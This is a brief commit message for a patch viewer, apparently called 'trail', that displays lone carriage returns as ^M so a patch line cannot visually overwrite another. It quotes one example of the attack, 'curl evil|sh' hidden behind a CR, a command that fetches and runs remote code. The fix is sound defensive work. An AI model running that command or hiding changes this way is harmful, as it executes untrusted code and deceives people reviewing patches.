fix(trail): show a lone carriage return in a patch as ^M

Keeping every CR let a patch line hide another's text on screen ('+curl evil|sh\r+// harmless') while the hidden bytes are what gets applied. Keep CR only where it ends a CRLF line; show a lone one.
